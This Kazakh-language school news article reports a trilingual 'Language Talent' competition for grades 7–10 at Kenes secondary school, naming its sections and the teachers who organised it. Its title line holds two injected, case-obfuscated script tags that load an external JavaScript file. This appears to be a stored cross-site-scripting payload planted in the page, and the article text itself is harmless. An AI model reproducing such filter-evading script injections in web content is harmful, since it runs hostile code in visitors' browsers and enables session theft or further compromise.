«Тіл дарыны» байқауы<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

03.02.2019

Қыстың қатты  суығына да қарамастан, қаңтардың  соңғы күні Кеңес орта мектебінде  «Тіл дарыны» байқауы өтті. Үш тіл білу заман талабы . Тілді құрметтеу, үш тілді насихаттау аясында ұйымдастырылған іс-шара  барысында оқушылардың тілді меңгеруге деген қызығушылықтарының басым екендігін байқадық.

     Ереже бойынша 9 бөлімнен тұратын тапсырмаларға  оқушылар сүрінбей жауап бере білді. Байқаудың тәртібі: «Полиглот», «Мәдениеттаным», «Ұлттаным» ,«Тең шарттарда диолог», «Түйіндеме», «Ең үздік мәнерлеп оқушы», «Экскурсия жетекшісі», «Жас ақын», «Үздік коллиграфист»  үш тілде жан-жақты дамыған , бәсекеге қабілетті тұлға тәрбиелеу мақсатымен өткізілген сыныптан тыс іс-шара көрермен көңілінен шықты.

      Рухани жанғыру бағдарламасына сәйкес қазақ тілі мұғалімдері Аскенова Г.Е мен Аятхан Ж ,орыс тіл пәні мұғалімі  Жаналина. Г.С, ағылшын тілі пәнінің  мұғалімі  Багдаулет А  осы байқауды ұйымдастырып,шәкірттерінің жүрегінен жол таба білді.

    «Жеті жұрттың тілін біл,

Жеті түрлі білім біл»дегендей тілді үйрену де өнер.Сайысқа қатысқан  7-10 сынып оқушылары үш тілде білімдерін сынақтан өткізді.

     Сайыс соңынан жеңімпаз оқушылар анықталып, мақтау қағаздарымен марапатталды. Осындай игі іс-шаралар көбейіп, тіліміздің мерейі артып, өркендей берсе екен дегім келеді.

 

Кеңес орта мектебінің тәрбие ісінің меңгерушісі Ахметқалиева Қ.Б

 

 

Просмотров: 1003


Пікір қосу



Деректерді қолтаңбаға қосу